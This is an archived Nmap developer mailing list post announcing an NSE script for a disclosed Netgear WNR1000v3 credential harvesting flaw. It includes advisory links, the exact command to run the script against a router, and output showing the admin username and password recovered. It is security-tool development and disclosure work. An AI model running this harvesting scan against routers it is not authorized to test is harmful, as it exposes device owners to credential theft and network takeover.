Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

[NSE] Script for Netgear WNR1000v3 Credential Harvesting Exploit

From: Paul AMAR <aos.paul () gmail com>
Date: Tue, 11 Feb 2014 22:02:29 +0100
Good evening,

I developed the NSE script regarding the exploit : *Netgear WNR1000v3
Credential Harvesting Exploit* discovered by c1ph04.
This has been released the 26th of January 2014.

Here are few references :

- http://www.securelist.com/en/advisories/56330
- http://secunia.com/community/advisories/56330
and obviously :
http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html

I have a Netgear WNR1000 at home so I could try it by myself with the
default settings.
Command line to launch the script :

*./nmap -p80 -n -Pn --script http-vuln-wnr-1000 192.168.1.1 -d*

Output :

NSE: Script scanning 192.168.1.1.
NSE: Starting runlevel 1 (of 1) scan.
NSE: Starting http-vuln-wnr-1000 against 192.168.1.1:80.
Initiating NSE at 21:49
NSE: username : admin
NSE: password : password
NSE: Finished http-vuln-wnr-1000 against 192.168.1.1:80.
Completed NSE at 21:49, 0.27s elapsed


Cheers,
Paul A.

Attachment: http-vuln-wnr-1000.nse
Description: 

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: